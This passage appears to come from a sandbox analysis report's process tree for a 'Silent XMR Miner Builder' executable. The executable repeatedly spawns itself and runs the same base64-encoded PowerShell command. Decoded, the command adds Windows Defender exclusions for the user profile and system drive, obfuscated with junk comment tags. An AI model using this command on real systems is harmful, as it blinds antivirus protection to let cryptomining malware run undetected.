        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        20⤵
        
        PID:6708
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        20⤵
        
        PID:6808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        21⤵
        
        PID:7052
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        21⤵
        
        PID:7108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        22⤵
        
        PID:5608
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        22⤵
        
        PID:6644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        23⤵
        
        PID:6704
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        23⤵
        
        PID:4108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        24⤵
        
        PID:5952
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        24⤵
        
        PID:6780
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        25⤵
        
        PID:5464
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        25⤵
        
        PID:6976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        26⤵
        
        PID:5440
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        26⤵
        
        PID:6744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        27⤵
        
        PID:6796
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        27⤵
        
        PID:5664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        28⤵
        
        PID:7440
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        28⤵
        
        PID:7508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        29⤵
        
        PID:7964
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        29⤵
        
        PID:8012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        30⤵
        
        PID:7188
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        30⤵
        
        PID:7480
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        31⤵
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        31⤵
        
        PID:1872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        32⤵
        
        PID:7296
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        32⤵
        
        PID:7532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        33⤵
        
        PID:7920
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        33⤵
        
        PID:3440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        34⤵
        
        PID:3984
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        34⤵
        
        PID:3436
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        35⤵
        
        PID:2644
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        35⤵
        
        PID:1360
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        36⤵
        
        PID:6944
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        36⤵
        
        PID:2816
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        37⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        37⤵
        
        PID:5360
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        38⤵
        
        PID:6652
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        38⤵
        
        PID:7536
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        39⤵
        
        PID:7944
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        39⤵
        
        PID:5856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        40⤵
        
        PID:6472
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        40⤵
        
        PID:4692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        41⤵
        
        PID:6332
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        41⤵
        
        PID:6028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        42⤵
        
        PID:8104
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        42⤵
        
        PID:7148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        43⤵
        
        PID:7492
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        43⤵
        
        PID:1312
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        44⤵
        
        PID:7988
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        44⤵
        
        PID:8148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        45⤵
        
        PID:6288
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        45⤵
        
        PID:6584
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        46⤵
        
        PID:264
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        47⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        46⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        47⤵
        
        PID:3456
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        47⤵
        
        PID:6320
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        48⤵
        
        PID:5996
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        48⤵
        
        PID:7668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        49⤵
        
        PID:468
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        49⤵
        
        PID:7080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        50⤵
        
        PID:7760
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        50⤵
        
        PID:7416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        51⤵
        
        PID:6940
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
